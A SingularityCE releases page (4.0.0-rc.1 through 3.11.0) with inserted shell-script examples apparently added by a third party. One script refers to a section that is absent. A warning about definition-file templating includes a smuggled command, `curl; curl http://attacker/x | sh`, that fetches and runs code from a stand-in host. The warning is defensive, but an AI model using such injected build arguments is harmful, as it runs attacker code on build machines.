
Releases: sylabs/singularity

SingularityCE 4.0.0 Release Candidate 1

17 Aug 14:57
4171789
Pre-release

SingularityCE 4.0.0-rc.1 is a release candidate for the upcoming 4.0.0 release, with changes detailed below.

OCI-mode

Singularity 4 introduces OCI-mode as a fully supported feature. It is enabled by using the --oci flag with the run / shell / exec / pull commands, or by setting oci mode = yes in singularity.conf.

In OCI-mode:

  • Container images from OCI sources are pulled to an OCI-SIF file. An OCI-SIF file encapsulates the OCI image configuration and squashed filesystem using an OCI structure, rather than a Singularity-specific one.
  • The run / shell / exec commands use a low-level OCI runtime (crun/runc) for container execution.
  • Default operation is compatible with other OCI tools, similar to using --compat in Singularity's non-OCI native mode.
  • OCI-mode supports running existing non-OCI-SIF Singularity images, and can be made to imitate native mode default behaviour by using the --no-compat flag.

OCI-mode changes from 3.11 to 4.0 include:

  • run / shell / exec in OCI-mode now includes support for the following existing CLI flags:
    • --add-caps
    • --drop-caps
    • --keep-privs
    • --no-privs
    • --overlay from directories, bare squashfs and extfs images.
    • --workdir
    • --scratch
    • --no-home
    • --no-mount (dev cannot be disabled in OCI mode)
    • --no-umask (with --no-compat)
    • --writable-tmpfs (with --no-compat)
  • Added --device flag to "action" commands (run/exec/shell) when run in OCI mode (--oci). Currently supports passing one or more (comma-separated) fully-qualified CDI device names, and those devices will then be made available inside the container.
  • Added --cdi-dirs flag to override the default search locations for CDI json files, allowing, for example, users who don't have root access on their host machine to nevertheless create CDI mappings (into containers run with --fakeroot, for example).
  • A container run as root, or with --fakeroot, has OCI default effective/permitted capabilities.
  • An --env-file is evaluated with respect to the host environment, to match native mode behaviour.
  • If the kernel does not support unprivileged overlays, OCI-mode will attempt to use fuse-overlayfs and fusermount for overlay mounting and unmounting.
  • Support for the SINGULARITY_CONTAINLIBS env var, to specify libraries to bind into /.singularity.d/libs/ in the container.
  • Support for running OCI-SIF images directly from docker://, http://, https:// and oras:// URIs.
  • A new --no-compat flag can be used with OCI-mode to mirror singularity's historic native mode behavior on a variety of settings, instead of setting them the way other OCI runtimes typically do:
    • $HOME, /tmp, /var/tmp are bind mounted from the host.
    • The full /dev is bind mounted from the host, unless mount dev = minimal in singularity.conf (requires crun, not applied with runc).
    • bind path entries in singularity.conf are mounted into the container.
    • The current working directory is mounted into the container, and is the entry point into the container.
    • The container is read-only unless --writable-tmpfs is also used.
    • The host umask is propagated into the container, unless --no-umask is also used.
    • When a native (non-OCI-SIF) image is run in OCI-mode, environment variables will be shell evaluated on container startup.
  • The pull command now accepts a new flag --oci for OCI image sources. This will create an OCI-SIF image rather than convert to Singularity's native container format.
  • OCI-SIF containers can be pushed/pulled to/from OCI registries as single file artifacts using oras:// URIs.
  • OCI-SIF containers can be pushed/pulled to/from registries as OCI images, with a single squashfs layer, using docker:// URIs.
  • A new oci mode directive in singularity.conf can be set to true to enable OCI-mode by default. It can be negated with a new --no-oci command line flag.

See the admin guide and user guide for full requirements of OCI-mode and usage information.
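The --device and --cdi-dirs flags above take a fully-qualified CDI device name and a directory of CDI JSON specs. The script below is an added example, not SingularityCE code: it writes a minimal CDI spec into a directory the user owns and builds the matching --device argument. The vendor/class example.com/sensor, the device name s0, the host path /dev/ttyUSB0, the SENSOR_DEVICE variable and the alpine:3.18 image are placeholders chosen for this example. Treat spec directories as trusted input: every containerEdit in a spec (device nodes, mounts, environment, hooks) is applied to the container as written, so --cdi-dirs should only point at directories that only you can write.

```shell
#!/bin/sh
# Added example (not part of SingularityCE): write a minimal CDI spec into a
# user-owned directory and build the --device argument that refers to it.
# example.com/sensor, s0, /dev/ttyUSB0 and SENSOR_DEVICE are placeholders.

# write_cdi_spec DIR KIND NAME HOSTPATH
# Writes DIR/<kind with '/' replaced by '_'>.json describing one device whose
# node HOSTPATH is exposed at the same path in the container, plus one
# environment variable pointing at it. Prints the spec path.
write_cdi_spec() {
    dir=$1; kind=$2; name=$3; hostpath=$4
    mkdir -p "$dir"
    spec="$dir/$(printf '%s' "$kind" | tr '/' '_').json"
    cat > "$spec" <<EOF
{
  "cdiVersion": "0.5.0",
  "kind": "$kind",
  "devices": [
    {
      "name": "$name",
      "containerEdits": {
        "deviceNodes": [ { "path": "$hostpath" } ],
        "env": [ "SENSOR_DEVICE=$hostpath" ]
      }
    }
  ]
}
EOF
    printf '%s\n' "$spec"
}

# cdi_device_name KIND NAME -> fully-qualified CDI device name, KIND=NAME
cdi_device_name() {
    printf '%s=%s\n' "$1" "$2"
}

# spec_declares SPEC KIND NAME -> succeeds if SPEC declares device NAME of KIND
spec_declares() {
    grep -q "\"kind\": \"$2\"" "$1" && grep -q "\"name\": \"$3\"" "$1"
}

main() {
    cdidir="${HOME}/cdi"
    spec=$(write_cdi_spec "$cdidir" example.com/sensor s0 /dev/ttyUSB0)
    dev=$(cdi_device_name example.com/sensor s0)
    echo "wrote $spec; requesting $dev"
    # --cdi-dirs overrides the default search locations, so a non-root user can
    # point Singularity at a directory they own; --fakeroot is used as in the
    # release notes so the device node can be created inside the container.
    singularity exec --oci --fakeroot --cdi-dirs "$cdidir" --device "$dev" \
        docker://alpine:3.18 sh -c 'ls -l "$SENSOR_DEVICE"'
}

if [ "${1:-}" = "--run" ]; then main; fi
```

Run with `--run` to write the spec and start the container; without it the script only defines the helpers.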

Changed defaults / behaviours

Packages / Requirements

  • RPM packages now use /var/lib/singularity (rather than /var/singularity) to store local state files.
  • Bash completions are now installed in the modern share/bash-completion/completions location, rather than under etc.
  • The --vm and related flags to start singularity inside a VM have been removed. This functionality was related to the retired Singularity Desktop / SyOS projects.
  • Singularity uses squashfuse_ll / squashfuse, which is now built from a git submodule unless --without-squashfuse is passed to mconfig. When built with --without-squashfuse, squashfuse_ll or squashfuse is looked up on PATH at run time. Version 0.2.0 or later is required.
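The OCI-mode requirements spread over these notes (an oci mode default in singularity.conf, crun or runc, squashfuse_ll / squashfuse 0.2.0 or newer, and kernel unprivileged overlay or the fuse-overlayfs / fusermount fallback) can be checked on a host before users start relying on --oci. The script below is an added example, not SingularityCE code. Its assumptions: the config lives at /etc/singularity/singularity.conf unless SINGULARITY_CONF is set, the squashfuse usage banner starts with the package name and version, and overlayfs in a user namespace needs kernel 5.11 or newer.

```shell
#!/bin/sh
# Added example (not SingularityCE code): pre-flight checks for OCI-mode.
# Assumptions: config path below, squashfuse banner "<name> <version> ...",
# and kernel >= 5.11 for unprivileged overlayfs in a user namespace.

SINGULARITY_CONF=${SINGULARITY_CONF:-/etc/singularity/singularity.conf}

# conf_value FILE KEY -> value of the first uncommented "KEY = value" line
conf_value() {
    sed -n "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*//p" "$1" \
        | sed 's/[[:space:]]*$//' | head -n 1
}

# version_ge A B -> succeeds when dotted version A is >= B (numeric components)
version_ge() {
    a=$1; b=$2
    while [ -n "$a" ] || [ -n "$b" ]; do
        x=${a%%.*}; y=${b%%.*}
        if [ "$a" = "$x" ]; then a=; else a=${a#*.}; fi
        if [ "$b" = "$y" ]; then b=; else b=${b#*.}; fi
        [ "${x:-0}" -gt "${y:-0}" ] && return 0
        [ "${x:-0}" -lt "${y:-0}" ] && return 1
    done
    return 0
}

# oci_runtime -> prints the path of crun (preferred since 3.11) or runc; fails if neither
oci_runtime() {
    command -v crun 2>/dev/null && return 0
    command -v runc 2>/dev/null && return 0
    return 1
}

# squashfuse_version -> version of squashfuse_ll or squashfuse found on PATH
squashfuse_version() {
    for bin in squashfuse_ll squashfuse; do
        command -v "$bin" >/dev/null 2>&1 || continue
        "$bin" --help 2>&1 | sed -n 's/^squashfuse[_a-z]* \([0-9][0-9.]*\).*/\1/p' | head -n 1
        return 0
    done
    return 1
}

# kernel_unpriv_overlay -> succeeds if the running kernel should allow overlay in a userns
kernel_unpriv_overlay() {
    k=$(uname -r | sed 's/[^0-9.].*//')
    version_ge "$k" 5.11 && grep -qw overlay /proc/filesystems
}

main() {
    printf 'oci mode default : %s\n' "$(conf_value "$SINGULARITY_CONF" 'oci mode')"
    printf 'mount dev        : %s\n' "$(conf_value "$SINGULARITY_CONF" 'mount dev')"
    if rt=$(oci_runtime); then printf 'OCI runtime      : %s\n' "$rt"
    else echo 'OCI runtime      : MISSING, install crun (or runc)'; fi
    if v=$(squashfuse_version) && version_ge "${v:-0}" 0.2.0; then
        printf 'squashfuse       : %s\n' "$v"
    else echo 'squashfuse       : MISSING or older than 0.2.0'; fi
    if kernel_unpriv_overlay; then echo 'overlay          : kernel (unprivileged)'
    elif command -v fuse-overlayfs >/dev/null 2>&1 && command -v fusermount >/dev/null 2>&1; then
        echo 'overlay          : fuse-overlayfs fallback'
    else echo 'overlay          : neither kernel overlay nor fuse-overlayfs available'; fi
}

if [ "${1:-}" = "--run" ]; then main; fi
```

Run with `--run` on the host being checked. The mount dev value is printed because, with --no-compat, mount dev = minimal is only honoured by crun, so a runc-only host gives the container the full host /dev.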

CLI

  • The commands related to OCI/Docker registries that were under remote have been moved to their own, dedicated registry command. Run singularity help registry for more information.
  • The remote list subcommand now outputs only remote endpoints (with keyservers and OCI/Docker registries having been moved to separate commands), and the output has been streamlined.
  • Adding a new remote endpoint using the singularity remote add command will now set the new endpoint as default. This behavior can be suppressed by supplying the --no-default (or -n) flag to remote add.
  • The keyserver-related commands that were under remote have been moved to their own, dedicated keyserver command. Run singularity help keyserver for more information.
  • Improved the clarity of singularity key list output.
  • --cwd is now the preferred form of the flag for setting the container's working directory, though --pwd is still supported for compatibility.

Runtime Behaviour

  • The way --home is handled when running as root (e.g. sudo singularity) or with --fakeroot has changed. Previously, we were only modifying the HOME environment variable in these cases, while leaving the container's /etc/passwd file unchanged (with its homedir field pointing to /root, regardless of the value passed to --home). With this change, both the value of HOME and the contents of /etc/passwd in the container will reflect the value passed to --home.
  • Bind mounts are now performed in the order of their occurrence on the command line, or within the value of the SINGULARITY_BIND environment variable. (Previously, image-mounts were always performed first, regardless of order.)
  • Default OCI config generated with singularity oci mount no longer sets any inheritable / ambient capabilities, matching other OCI runtimes.
  • singularity oci mount now uses, and requires, squashfuse_ll or squashfuse to mount a SIF image to an OCI bundle. Note that squashfuse_ll is built with singularity unless --without-squashfuse is passed to mconfig.
  • The current working directory is created in the container when it doesn't exist, so that it can be entered. You must now specify --no-mount home,cwd instead of just --no-mount home to avoid mounting from $HOME if you run singularity from inside $HOME.
  • If the path of the current working directory in the container and on the host contain symlinks to different locations, it will not be mounted.

New Features & Functionality

  • Templating support for definition files: users can now define variables in definition files via a matching pair of double curly brackets. Variables of the form {{ variable }} will be replaced by a value defined either by a variable=value entry in the %arguments section of the definition file, or through new build options --build-arg or --build-arg-file.
  • Added --secret flag (shorthand: -s) to key remove subcommand, to allow removal of a private key by fingerprint.
  • Added --private as a synonym for --secret in key list, key export, and key remove subcommands.
  • The remote status command will now print the username, realname, and email of the logged-in user, if available.
  • The cache commands now accept --type oci-sif to list and clean cached OCI-SIF image conversions of OCI sources.
  • The instance start command now accepts an optional --app <name> argument which invokes the start script within the %appstart <name> section in the definition file. The instance stop command still only requires the instance name.
  • A new --no-pid flag for singularity run/shell/exec disables the PID namespace inferred by --containall and --compat.
  • A new --platform flag can be used to specify an OS/Architecture[/Variant] when pulling images from OCI or library sources. When pulling from library sources the optional variant is ignored.
  • The --arch flag can now be used to specify a required architecture when pulling images from OCI, as well as library sources.
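Definition-file templating, described above, substitutes {{ variable }} textually with a value from %arguments, --build-arg or --build-arg-file. The script below is an added example, not SingularityCE code: it lists the variables a definition file uses, reads the defaults from %arguments, and reports any variable with neither a default nor an entry in a build-arg file, so a build does not start with an undefined variable. Assumptions: build-arg files hold one name=value per line (the same form as %arguments entries); the definition file and argument file written by main are constructed for this example.

```shell
#!/bin/sh
# Added example (not SingularityCE code): lint a templated definition file
# before building. Assumes build-arg files hold one name=value per line.

# template_vars DEF -> unique variable names referenced as {{ name }}
template_vars() {
    grep -o '{{[[:space:]]*[A-Za-z_][A-Za-z0-9_]*[[:space:]]*}}' "$1" \
        | sed 's/[{}[:space:]]//g' | sort -u
}

# arguments_defaults DEF -> name=value lines from the %arguments section
arguments_defaults() {
    awk '/^%arguments/ { in_args = 1; next }
         /^%/          { in_args = 0 }
         in_args && /=/ { sub(/^[ \t]+/, ""); print }' "$1"
}

# has_arg NAME FILE -> succeeds if FILE exists and has a NAME=... line
has_arg() {
    [ -f "$2" ] && grep -q "^[[:space:]]*$1=" "$2"
}

# missing_vars DEF ARGFILE -> variables used in DEF that nothing defines
missing_vars() {
    def=$1; argfile=$2
    defaults=$(mktemp)
    arguments_defaults "$def" > "$defaults"
    for v in $(template_vars "$def"); do
        has_arg "$v" "$defaults" && continue
        has_arg "$v" "$argfile" && continue
        echo "$v"
    done
    rm -f "$defaults"
}

main() {
    work=$(mktemp -d)
    # Constructed definition file: base_image has a default, package does not.
    cat > "$work/tpl.def" <<'EOF'
Bootstrap: docker
From: {{ base_image }}

%arguments
    base_image=alpine:3.18

%post
    apk add --no-cache {{ package }}
EOF
    printf 'package=curl\n' > "$work/args.txt"
    echo "undefined without an argument file: $(missing_vars "$work/tpl.def" "")"
    echo "undefined with args.txt           : $(missing_vars "$work/tpl.def" "$work/args.txt")"
    # Values are substituted textually, including into %post, which runs as
    # (emulated) root during the build: only pass trusted build arguments.
    singularity build --build-arg-file "$work/args.txt" \
        --build-arg base_image=alpine:3.19 "$work/out.sif" "$work/tpl.def"
}

if [ "${1:-}" = "--run" ]; then main; fi
```

Because substitution is textual, a value such as `curl; curl http://attacker/x | sh` becomes part of the %post script; build arguments are effectively code and should come only from sources trusted to the same degree as the definition file itself.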

Developer / API

  • Support for image driver plugins, deprecated at 3.11, has been removed. Unprivileged kernel overlay is supported without a plugin. In singularity.conf, the image driver directive has been removed, and enable overlay no longer supports the driver option.
  • Changes in pkg/build/types.Definition struct. New .FullRaw field introduced, which always contains the raw data for the entire definition file. Behavior of .Raw field has changed: for multi-stage builds parsed with pkg/build/types/parser.All(), .Raw contains the raw content of a single build stage. Otherwise, it is equal to .FullRaw.
  • The SingularityCE go module is now github.com/sylabs/singularity/v4, reflecting the major version of the application.

Bug Fixes

  • Fix interaction between --workdir when given relative path and --scratch.
  • Set correct $HOME in --oci mode when mount home = no in singularity.conf.
  • Lookup a...

SingularityCE 3.11.4

22 Jun 13:16
fa324de

SingularityCE 3.11.4 is a patch release in the 3.11 series, with changes detailed below.

Changed defaults / behaviours

  • Add the xino=on mount option for writable kernel overlay mount points, to fix inode number consistency after a kernel cache flush.

New Features & Functionality

  • The tap CNI plugin, new to github.com/containernetworking/plugins v1.3.0, is now provided.
  • Added remote get-login-password subcommand that allows the user to retrieve a CLI token to interact with the OCI registry of a Singularity Enterprise instance.
  • Added --no-setgroups flag for --fakeroot builds and run/shell/exec. This prevents the setgroups syscall from being used on the container process in the fakeroot user namespace, so that access from within the user namespace to host files whose permissions depend on supplementary group membership is retained. Note that supplementary groups are mapped to nobody in the container, and chgrp, newgrp, etc. cannot be used.
  • Added ability to set a custom user config directory (default $HOME/.singularity) via the new SINGULARITY_CONFIGDIR environment variable.

Bug Fixes

  • In --oci mode, do not attempt to use unprivileged overlay on systems that do not support it.
  • Fix dropped "n" characters on some platforms in definition file stored as part of SIF metadata.
  • Pass STDIN to --oci containers correctly, to fix piping input to a container.
  • Fix compilation on 32-bit systems.
  • Fix seccomp filters to allow mknod/mknodat syscalls to create pipe/socket and character devices with device number 0 for fakeroot builds.
  • Fix freeze when copying files between stages in an unprivileged proot build.
  • Fix non-POSIX sh operator in mconfig.
  • Correct internal name for CAP_BLOCK_SUSPEND.

Thanks / Reporting Bugs

Thanks to our contributors for code, feedback, and testing efforts!

As always, please report any bugs to: https://github.com/sylabs/singularity/issues/new

If you think that you've discovered a security vulnerability please report it to: security@sylabs.io

Have fun!

Downloads

Source Code

Please use the singularity-ce-3.11.4.tar.gz download below to obtain and install SingularityCE 3.11.4. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

  • Ubuntu 20.04 (focal)
  • Ubuntu 22.04 (jammy)
  • RHEL/CentOS 7 (el7)
  • RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
  • RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.20.5

SingularityCE 3.11.3

04 May 17:07
c2e9621

SingularityCE 3.11.3 is a patch release in the 3.11 series, with changes detailed below.

Changed defaults / behaviours

  • --oci mode now provides a writable container by default, using a tmpfs overlay. This improves parity with --compat mode in the native runtime, as --compat enables --writable-tmpfs.

Bug Fixes

  • Ensure the allow kernel squashfs directive in singularity.conf applies to encrypted squashfs filesystems in a SIF.

Downloads

Source Code

Please use the singularity-ce-3.11.3.tar.gz download below to obtain and install SingularityCE 3.11.3. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

  • Ubuntu 18.04 (bionic)
  • Ubuntu 20.04 (focal)
  • Ubuntu 22.04 (jammy)
  • RHEL/CentOS 7 (el7)
  • RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
  • RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.20.4

SingularityCE 3.11.2

27 Apr 13:32
62bb0eb

SingularityCE 3.11.2 is a patch release in the 3.11 series, with changes detailed below.

New Features & Functionality

  • OCI mode now supports --hostname (requires UTS namespace, therefore this flag will infer --uts).
  • OCI mode now supports --scratch (shorthand: -S) to mount a tmpfs scratch directory in the container.
  • Support --pwd in OCI mode.
  • OCI mode now supports --home. Supplying a single location (e.g. --home /myhomedir) will result in a new tmpfs directory being created at the specified location inside the container, and that dir being set as the in-container user's home dir. Supplying two locations separated by a colon (e.g. --home /home/user:/myhomedir) will result in the first location on the host being bind-mounted as the second location in-container, and set as the in-container user's home dir.
  • OCI mode now handles --dns and resolv.conf on par with native mode: the --dns flag can be used to pass a comma-separated list of DNS servers that will be used in the container; if this flag is not used, the container will use the same resolv.conf settings as the host.
  • Added allow kernel squashfs directive to singularity.conf. Defaults to yes. When set to no, Singularity will not mount squashfs filesystems using the kernel squashfs driver.
  • Added allow kernel extfs directive to singularity.conf. Defaults to yes. When set to no, Singularity will not mount extfs filesystems using the kernel extfs driver.
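The two allow kernel directives above take the kernel squashfs and extfs drivers out of the path that mounts user-supplied images. The script below is an added example, not SingularityCE code: it sets both directives to no in a copy of singularity.conf (rewriting an existing line or appending a missing one) so the change can be reviewed before the copy is installed. The default config path and the edit-a-copy workflow are this script's own choices; the file contents in the test are constructed.

```shell
#!/bin/sh
# Added example (not SingularityCE code): disable kernel squashfs / extfs
# mounting of images in a copy of singularity.conf for review.

# conf_set FILE KEY VALUE -> rewrite the "KEY = ..." line, or append one if absent
conf_set() {
    file=$1; key=$2; value=$3
    if grep -q "^[[:space:]]*$key[[:space:]]*=" "$file"; then
        tmp=$(mktemp)
        sed "s/^[[:space:]]*$key[[:space:]]*=.*/$key = $value/" "$file" > "$tmp" \
            && mv "$tmp" "$file"
    else
        printf '%s = %s\n' "$key" "$value" >> "$file"
    fi
}

# harden_image_mounts FILE -> both directives from these notes set to "no"
harden_image_mounts() {
    conf_set "$1" "allow kernel squashfs" no
    conf_set "$1" "allow kernel extfs" no
}

main() {
    src=${1:-/etc/singularity/singularity.conf}
    work=$(mktemp)
    cp "$src" "$work"
    harden_image_mounts "$work"
    echo "resulting directives:"
    grep '^allow kernel' "$work"
    diff -u "$src" "$work" || true
    echo "review $work, then install it over $src"
}

if [ "${1:-}" = "--run" ]; then main "${2:-}"; fi
```

With the kernel drivers disallowed, image mounts have to be served some other way (squashfuse for squashfs, fuse2fs for extfs, on installations that provide them; this is an assumption of the note, not something these release notes state), so confirm those tools are present on the hosts before rolling the file out.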

Bug Fixes

  • Require runc in RPM packages built on SLES, not crun, because crun is part of the Package Hub community repository that may not be enabled. SingularityCE will still prefer crun if it has been installed.
  • Use /dev/loop-control for loop device creation, to avoid issues with recent kernel patch where max_loop is not set.
  • Always request inner userns in --oci mode without --fakeroot, so that inner id mapping is applied correctly.
  • Use correct target uid/gid for inner id mappings in --oci mode.
  • Avoid runc cgroup creation error when using --oci from a root-owned cgroup (e.g. ssh login session scope).
  • Pass host's TERM environment variable to container in OCI mode. Can be overridden by setting SINGULARITYENV_TERM on host.
  • Honour config passwd and config group directives from singularity.conf in --oci mode.
  • Honour mount proc / mount sys / mount tmp / mount home directives from singularity.conf in --oci mode.
  • Corrected singularity.conf comment, to refer to correct file as source of default capabilities when root default capabilities = file.

Downloads

Source Code

Please use the singularity-ce-3.11.2.tar.gz download below to obtain and install SingularityCE 3.11.2. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

  • Ubuntu 18.04 (bionic)
  • Ubuntu 20.04 (focal)
  • Ubuntu 22.04 (jammy)
  • RHEL/CentOS 7 (el7)
  • RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
  • RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.20.3

SingularityCE 3.11.1

14 Mar 16:28
c3885a5

SingularityCE 3.11.1 is a bugfix patch release in the 3.11 series, with changes detailed below.

New Features & Functionality

  • Add setopt definition file header for the yum bootstrap agent. The setopt value is passed to yum / dnf using the --setopt flag. This permits setting e.g. install_weak_deps=False to bootstrap recent versions of Fedora, where systemd (a weak dependency) cannot install correctly in the container. See examples/Fedora for an example definition file.
  • Warn user that a yum bootstrap of an older distro may fail if the host rpm _db_backend is not bdb.

Bug Fixes

  • Fix implied --writable-tmpfs with --nvccli, to avoid r/o filesystem error.
  • Avoid incorrect error when requesting fakeroot network.
  • Pass computed LD_LIBRARY_PATH to wrapped unsquashfs. Fixes issues where unsquashfs on host uses libraries in non-default paths.
  • Show correct memory limit in instance stats when a limit is set.
  • Ensure consistent binding of libraries under --nv/--rocm when duplicate <library>.so[.version] files are listed by ldconfig -p.
  • Fix systemd cgroup manager error when running a container as a non-root user with --oci, on systems with cgroups v1 and runc.
  • Fix joining cgroup of instance started as root, with cgroups v1, non-default cgroupfs manager, and no device rules.

Downloads

Source Code

Please use the singularity-ce-3.11.1.tar.gz download below to obtain and install SingularityCE 3.11.1. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

  • Ubuntu 18.04 (bionic)
  • Ubuntu 20.04 (focal)
  • Ubuntu 22.04 (jammy)
  • RHEL/CentOS 7 (el7)
  • RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
  • RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.20.2

SingularityCE 3.11.0

10 Feb 12:39
e773d54

SingularityCE 3.11.0 is the first release in the 3.11 series, with changes, new features, and bug fixes detailed below.

Changed defaults / behaviours

  • Image driver plugins, implementing the RegisterImageDriver callback, are deprecated and will be removed in 4.0. Support for the example plugin, permitting Ubuntu unprivileged overlay functionality, has been replaced with direct support for kernel unprivileged overlay.
  • When the kernel supports unprivileged overlay mounts in a user namespace, the container will be constructed using an overlay instead of underlay layout.
  • crun will be used as the low-level OCI runtime, when available, rather than runc. If crun is not available, runc will be used.
  • sessiondir maxsize in singularity.conf now defaults to 64 MiB for new installations. This is an increase from 16 MiB in prior versions.
  • Instances are started in a cgroup, by default, when run as root or when unified cgroups v2 with systemd as manager is configured. This allows singularity instance stats to be supported by default when possible.

New features / functionality

Image Building

  • Support for a custom hashbang in the %test section of a Singularity recipe (akin to the runscript and start sections).
  • Non-root users can now build from a definition file, on systems that do not support --fakeroot. This requires the statically built proot command (https://proot-me.github.io/) to be available on the user PATH. These builds:
    • Do not support arch / debootstrap / yum / zypper bootstraps. Use localimage, library, oras, or one of the docker/oci sources.
    • Do not support %pre and %setup sections.
    • Run the %post sections of a build in the container as an emulated root user.
    • Run the %test section of a build as the non-root user, like singularity test.
    • Are subject to any restrictions imposed in singularity.conf. Incur a performance penalty due to proot's ptrace based interception of syscalls.
    • May fail if the %post script requires privileged operations that proot cannot emulate.

Instances

  • Instances started by a non-root user can use --apply-cgroups to apply resource limits. Requires cgroups v2, and delegation configured via systemd.
  • A new instance stats command displays basic resource usage statistics for a specified instance, running within a cgroup.
  • Instance name is available inside an instance via the new SINGULARITY_INSTANCE environment variable.

Mounts & Overlays

  • --writable-tmpfs is now available when running unprivileged, or explicitly requesting a user namespace, on systems with a kernel that supports unprivileged overlay mounts in a user namespace.
  • The --no-mount flag now accepts the value bind-paths to disable mounting of all bind path entries in singularity.conf.
  • Persistent overlays (--overlay) from a directory are now available when running unprivileged, or explicitly requesting a user namespace, on systems with a kernel that supports unprivileged overlay mounts in a user namespace.
  • Add --sparse flag to overlay create command to allow generation of a sparse ext3 overlay image.

OCI / Docker Compatibility

  • Support for DOCKER_HOST parsing when using docker-daemon://
  • DOCKER_USERNAME and DOCKER_PASSWORD supported without SINGULARITY_ prefix.
  • A new --oci flag for run/exec/shell enables the experimental OCI runtime mode. This mode:
    • Runs OCI container images from an OCI bundle, using runc or crun.
    • Supports docker://, docker-archive:, docker-daemon:, oci:, oci-archive: image sources.
    • Does not support running Singularity SIF, SquashFS, or EXT3 images.
    • Provides an environment similar to Singularity's native runtime, running with --compat.
    • Supports the following options / flags. Other options are not yet supported:
      • --fakeroot for effective root in the container. Requires subuid/subgid mappings.
      • Bind mounts via --bind or --mount. No image mounts.
      • Additional namespaces requests with --net, --uts, --user.
      • Container environment variables via --env, --env-file, and SINGULARITYENV_ host env vars.
      • --rocm to bind ROCm GPU libraries and devices into the container.
      • --nv to bind Nvidia driver / basic CUDA libraries and devices into the container.
      • --apply-cgroups, and the --cpu*, --blkio*, --memory*, --pids-limit flags to apply resource limits.

Signing & Verification

  • The sign command now supports signing with non-PGP key material by specifying the path to a private key via the --key flag.
  • The verify command now supports verification with non-PGP key material by specifying the path to a public key via the --key flag.
  • The verify command now supports verification with X.509 certificates by specifying the path to a certificate via the --certificate flag. By default, the system root certificate pool is used as trust anchors unless overridden via the --certificate-roots flag. A pool of intermediate certificates that are not trust anchors, but can be used to form a certificate chain can also be specified via the --certificate-intermediates flag.
  • Support for online verification checks of X.509 certificates using the OCSP protocol. (introduced flag: verify --ocsp-verify)
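The non-PGP signing flow above (and the identical list repeated in the 3.11.0-rc.1 notes further down) is: sign with --key and a private key, then verify with --key and the matching public key, or with --certificate and an X.509 certificate whose key is the one that signed, chained to explicit trust anchors. The script below is an added example, not SingularityCE code. The openssl commands, the file names, the ECDSA P-256 key type and the placeholder CA files are this script's own choices; image.sif is a placeholder. The only offline-testable parts are the small helpers that classify a PEM file and pick the verify flag for it, which exist to stop the common mistake of handing the private key to verify or the public key to --certificate.

```shell
#!/bin/sh
# Added example (not SingularityCE code): sign and verify a SIF with non-PGP
# key material. ECDSA P-256 via openssl and all file names are assumptions.

# pem_kind FILE -> private | public | certificate | unknown, from the PEM header
pem_kind() {
    case "$(head -n 1 "$1")" in
        "-----BEGIN PRIVATE KEY-----"|"-----BEGIN EC PRIVATE KEY-----"|"-----BEGIN RSA PRIVATE KEY-----")
            echo private ;;
        "-----BEGIN PUBLIC KEY-----")  echo public ;;
        "-----BEGIN CERTIFICATE-----") echo certificate ;;
        *)                             echo unknown ;;
    esac
}

# verify_flag FILE -> the singularity verify flag that accepts this PEM kind
verify_flag() {
    case "$(pem_kind "$1")" in
        public)      echo --key ;;
        certificate) echo --certificate ;;
        *)           return 1 ;;
    esac
}

# keypair DIR -> signer.pem (private) and signer.pub.pem (public) in DIR
keypair() {
    openssl genpkey -algorithm EC -pkeyopt ec_paramgen_curve:P-256 \
        -out "$1/signer.pem" 2>/dev/null
    openssl pkey -in "$1/signer.pem" -pubout -out "$1/signer.pub.pem" 2>/dev/null
}

main() {
    img=$1
    d=$(mktemp -d)
    keypair "$d"
    # Sign with the private key; verification pins to exactly that public key.
    singularity sign --key "$d/signer.pem" "$img"
    singularity verify "$(verify_flag "$d/signer.pub.pem")" "$d/signer.pub.pem" "$img"
    # X.509 variant: signer.crt.pem must carry the public key that matches
    # signer.pem. Explicit roots keep the trust decision independent of the
    # system certificate pool; --ocsp-verify adds an online revocation check.
    singularity verify --certificate signer.crt.pem \
        --certificate-roots ca-root.pem --certificate-intermediates ca-inter.pem \
        --ocsp-verify "$img"
}

if [ "${1:-}" = "--run" ]; then main "${2:-image.sif}"; fi
```

Keep signer.pem off the hosts that only verify: verification needs the public key or the certificate, never the private key.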

Other

  • Add new Linux capabilities: CAP_PERFMON, CAP_BPF, CAP_CHECKPOINT_RESTORE.
  • A new --reproducible flag for ./mconfig will configure Singularity so that its binaries do not contain non-reproducible paths. This disables plugin functionality.

Bug Fixes

  • In --rocm mode, the whole of /dev/dri is now bound into the container when --contain is in use. This makes /dev/dri/render devices available, required for later ROCm versions.
  • Overlay is blocked on the panfs filesystem, allowing sandbox directories to be run from panfs without error.
  • Avoid UID / GID readonly var warnings with --env-file.

Development / Testing

  • Significant reduction in the use of network image sources in the e2e tests.
  • Improved parallelization and use of image caches in the e2e tests.
  • The e2e-test makefile target now accepts an argument E2E_GROUPS to only run specified groups of end to end tests. E.g. make -C builddir e2e-test E2E_GROUPS=VERSION,HELP will run end to end tests in the VERSION and HELP groups only.
  • The e2e-test makefile target now accepts an argument E2E_TESTS which is a regular expression specifying the names of (top level) end to end tests that should be run. E.g. make -C builddir e2e-test E2E_TESTS=^semantic will only run end to end tests with a name that begins with semantic. These E2E_ variables offer an alternative to the -run flag, which may be easier to use given the structure of e2e tests.

Downloads

Source Code

Please use the singularity-ce-3.11.0.tar.gz download below to obtain and install SingularityCE 3.11.0. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

  • Ubuntu 18.04 (bionic)
  • Ubuntu 20.04 (focal)
  • Ubuntu 22.04 (jammy)
  • RHEL/CentOS 7 (el7)
